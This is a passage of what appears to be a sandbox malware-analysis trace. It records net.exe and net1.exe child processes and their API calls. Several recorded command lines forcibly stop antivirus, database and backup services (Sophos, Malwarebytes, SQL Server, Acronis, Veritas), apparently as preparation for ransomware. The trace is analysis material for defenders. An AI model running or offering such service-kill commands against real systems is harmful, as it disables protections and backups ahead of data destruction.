uBytes=0x68) returned 0x5c6170 [0125.856] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5c6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0125.856] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16fd20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fd20, lpOverlapped=0x0) returned 0 [0125.856] LocalFree (hMem=0x5c6170) returned 0x0 [0125.856] GetFileType (hFile=0x0) returned 0x0 [0125.856] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c6170 [0125.856] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0125.856] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fd20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fd20, lpOverlapped=0x0) returned 0 [0125.856] LocalFree (hMem=0x5c6170) returned 0x0 [0125.856] NetApiBufferFree (Buffer=0x5c1ae0) returned 0x0 [0125.856] NetApiBufferFree (Buffer=0x5c1af8) returned 0x0 [0125.856] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" [0125.856] exit (_Code=2) Process: id = "284" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4f38d000" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SAVAdminService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 691 os_tid = 0xdec Process: id = "285" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4ef92000" os_pid = "0xf04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 692 os_tid = 0xec8 Process: id = "286" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5a497000" os_pid = "0xf7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MBAMService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 693 os_tid = 0xee4 Process: id = "287" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4ea4f000" os_pid = "0x320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "168" os_parent_pid = "0x1180" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 694 os_tid = 0x758 [0125.914] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef9d4 | out: lpSystemTimeAsFileTime=0x1ef9d4*(dwLowDateTime=0x1ec9ff50, dwHighDateTime=0x1d6f0d1)) [0125.914] GetCurrentProcessId () returned 0x320 [0125.914] GetCurrentThreadId () returned 0x758 [0125.914] GetTickCount () returned 0x1152b84 [0125.914] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef9cc | out: lpPerformanceCount=0x1ef9cc*=24501508402) returned 1 [0125.914] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.915] __set_app_type (_Type=0x1) [0125.915] __p__fmode () returned 0x770331f4 [0125.915] __p__commode () returned 0x770331fc [0125.915] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.915] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.915] GetConsoleOutputCP () returned 0x1b5 [0125.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.915] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.919] sprintf_s (in: _DstBuf=0x1ef98c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.919] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.922] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0125.922] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.922] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" [0125.922] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ef758, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x88) returned 0x6a4ad8 [0125.922] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.922] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ef95c | out: Buffer=0x1ef95c*=0x6a1b10) returned 0x0 [0125.922] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ef95c | out: Buffer=0x1ef95c*=0x6a1b28) returned 0x0 [0125.922] _fileno (_File=0x77032900) returned -2 [0125.922] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.922] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.923] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.923] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.923] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.923] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.923] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.923] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.923] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.923] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.923] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.923] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.923] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.923] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.923] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.923] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.923] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.923] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.923] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.923] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.923] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.923] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.923] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0125.923] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0125.923] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0125.923] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0125.923] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0125.924] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -7 [0125.924] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -7 [0125.924] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -6 [0125.924] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -6 [0125.924] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -5 [0125.924] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -5 [0125.924] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0125.924] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 3 [0125.924] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.924] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.924] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.924] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.924] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.924] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.924] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.924] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.924] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 7 [0125.924] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 8 [0125.924] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 8 [0125.924] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0125.924] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -14 [0125.924] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0125.924] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0125.924] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 1 [0125.924] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0125.924] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0125.925] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0125.925] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0125.925] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0125.925] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0125.925] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 3 [0125.925] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -9 [0125.925] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0125.925] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.925] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.925] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0125.925] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0125.925] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0125.925] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 1 [0125.925] _wcsupr (in: _String="MSSQLFDLauncher$SYSTEM_BGC" | out: _String="MSSQLFDLAUNCHER$SYSTEM_BGC") returned="MSSQLFDLAUNCHER$SYSTEM_BGC" [0125.925] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6a54c0 [0126.572] GetServiceKeyNameW (in: hSCManager=0x6a54c0, lpDisplayName="MSSQLFDLAUNCHER$SYSTEM_BGC", lpServiceName=0xe5aaf0, lpcchBuffer=0x1ef8f8 | out: lpServiceName="", lpcchBuffer=0x1ef8f8) returned 0 [0126.573] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -12 [0126.573] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -14 [0126.573] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0126.573] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0126.573] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0126.573] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0126.573] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0126.573] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0126.573] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0126.573] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0126.573] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 3 [0126.573] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -9 [0126.573] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -1 [0126.573] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0126.573] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0126.573] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0126.573] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -1 [0126.573] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -12 [0126.573] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 1 [0126.573] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x1ef8f4 | out: bufptr=0x1ef8f4) returned 0x889 [0126.575] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.575] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.575] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.577] GetFileType (hFile=0x0) returned 0x0 [0126.577] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6a3b48 [0126.577] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6a3b48, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0126.577] WriteFile (in: hFile=0x0, lpBuffer=0x6a3b48, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ef834, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ef834, lpOverlapped=0x0) returned 0 [0126.577] LocalFree (hMem=0x6a3b48) returned 0x0 [0126.577] GetFileType (hFile=0x0) returned 0x0 [0126.577] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6a6178 [0126.577] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6a6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nj", lpUsedDefaultChar=0x0) returned 2 [0126.577] WriteFile (in: hFile=0x0, lpBuffer=0x6a6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef834, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ef834, lpOverlapped=0x0) returned 0 [0126.577] LocalFree (hMem=0x6a6178) returned 0x0 [0126.577] _ultow (in: _Dest=0x889, _Radix=2029668 | out: _Dest=0x889) returned="2185" [0126.577] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.577] GetFileType (hFile=0x0) returned 0x0 [0126.577] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6a6178 [0126.577] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6a6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.577] WriteFile (in: hFile=0x0, lpBuffer=0x6a6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ef840, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ef840, lpOverlapped=0x0) returned 0 [0126.577] LocalFree (hMem=0x6a6178) returned 0x0 [0126.578] GetFileType (hFile=0x0) returned 0x0 [0126.578] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6a6178 [0126.578] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6a6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nj", lpUsedDefaultChar=0x0) returned 2 [0126.578] WriteFile (in: hFile=0x0, lpBuffer=0x6a6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef840, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ef840, lpOverlapped=0x0) returned 0 [0126.578] LocalFree (hMem=0x6a6178) returned 0x0 [0126.578] NetApiBufferFree (Buffer=0x6a1b10) returned 0x0 [0126.578] NetApiBufferFree (Buffer=0x6a1b28) returned 0x0 [0126.578] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" [0126.578] exit (_Code=2) Process: id = "288" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4f14f000" os_pid = "0xdd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "136" os_parent_pid = "0x8d4" cmd_line = "C:\\Windows\\system32\\net1 stop PDVFSService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 695 os_tid = 0xce4 [0125.950] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fae4 | out: lpSystemTimeAsFileTime=0x10fae4*(dwLowDateTime=0x1ecec210, dwHighDateTime=0x1d6f0d1)) [0125.950] GetCurrentProcessId () returned 0xdd0 [0125.950] GetCurrentThreadId () returned 0xce4 [0125.950] GetTickCount () returned 0x1152ba3 [0125.950] QueryPerformanceCounter (in: lpPerformanceCount=0x10fadc | out: lpPerformanceCount=0x10fadc*=24505060976) returned 1 [0125.950] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.950] __set_app_type (_Type=0x1) [0125.950] __p__fmode () returned 0x770331f4 [0125.950] __p__commode () returned 0x770331fc [0125.950] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.950] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.950] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.951] GetConsoleOutputCP () returned 0x1b5 [0125.951] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.951] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.954] sprintf_s (in: _DstBuf=0x10fa9c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.954] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.956] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0125.956] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.956] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop PDVFSService /y" [0125.956] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f868, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.957] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x6c) returned 0x443ae0 [0125.957] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.957] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fa6c | out: Buffer=0x10fa6c*=0x441ae8) returned 0x0 [0125.957] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fa6c | out: Buffer=0x10fa6c*=0x441b00) returned 0x0 [0125.957] _fileno (_File=0x77032900) returned -2 [0125.957] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.957] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.957] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.957] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.957] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.957] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.957] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.957] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.957] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.957] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.957] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.957] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.957] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.957] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.957] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.957] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.957] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.957] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.958] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.958] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.958] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.958] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.958] _wcsicmp (_String1="accounts", _String2="PDVFSService") returned -15 [0125.958] _wcsicmp (_String1="computer", _String2="PDVFSService") returned -13 [0125.958] _wcsicmp (_String1="config", _String2="PDVFSService") returned -13 [0125.958] _wcsicmp (_String1="continue", _String2="PDVFSService") returned -13 [0125.958] _wcsicmp (_String1="cont", _String2="PDVFSService") returned -13 [0125.958] _wcsicmp (_String1="file", _String2="PDVFSService") returned -10 [0125.958] _wcsicmp (_String1="files", _String2="PDVFSService") returned -10 [0125.958] _wcsicmp (_String1="group", _String2="PDVFSService") returned -9 [0125.958] _wcsicmp (_String1="groups", _String2="PDVFSService") returned -9 [0125.958] _wcsicmp (_String1="help", _String2="PDVFSService") returned -8 [0125.958] _wcsicmp (_String1="helpmsg", _String2="PDVFSService") returned -8 [0125.958] _wcsicmp (_String1="localgroup", _String2="PDVFSService") returned -4 [0125.958] _wcsicmp (_String1="pause", _String2="PDVFSService") returned -3 [0125.958] _wcsicmp (_String1="session", _String2="PDVFSService") returned 3 [0125.958] _wcsicmp (_String1="sessions", _String2="PDVFSService") returned 3 [0125.958] _wcsicmp (_String1="sess", _String2="PDVFSService") returned 3 [0125.958] _wcsicmp (_String1="share", _String2="PDVFSService") returned 3 [0125.958] _wcsicmp (_String1="start", _String2="PDVFSService") returned 3 [0125.958] _wcsicmp (_String1="stats", _String2="PDVFSService") returned 3 [0125.958] _wcsicmp (_String1="statistics", _String2="PDVFSService") returned 3 [0125.958] _wcsicmp (_String1="stop", _String2="PDVFSService") returned 3 [0125.958] _wcsicmp (_String1="time", _String2="PDVFSService") returned 4 [0125.958] _wcsicmp (_String1="user", _String2="PDVFSService") returned 5 [0125.958] _wcsicmp (_String1="users", _String2="PDVFSService") returned 5 [0125.958] _wcsicmp (_String1="msg", _String2="PDVFSService") returned -3 [0125.958] _wcsicmp (_String1="messenger", _String2="PDVFSService") returned -3 [0125.958] _wcsicmp (_String1="receiver", _String2="PDVFSService") returned 2 [0125.958] _wcsicmp (_String1="rcv", _String2="PDVFSService") returned 2 [0125.958] _wcsicmp (_String1="netpopup", _String2="PDVFSService") returned -2 [0125.958] _wcsicmp (_String1="redirector", _String2="PDVFSService") returned 2 [0125.958] _wcsicmp (_String1="redir", _String2="PDVFSService") returned 2 [0125.958] _wcsicmp (_String1="rdr", _String2="PDVFSService") returned 2 [0125.959] _wcsicmp (_String1="workstation", _String2="PDVFSService") returned 7 [0125.959] _wcsicmp (_String1="work", _String2="PDVFSService") returned 7 [0125.959] _wcsicmp (_String1="wksta", _String2="PDVFSService") returned 7 [0125.959] _wcsicmp (_String1="prdr", _String2="PDVFSService") returned 14 [0125.959] _wcsicmp (_String1="devrdr", _String2="PDVFSService") returned -12 [0125.959] _wcsicmp (_String1="lanmanworkstation", _String2="PDVFSService") returned -4 [0125.959] 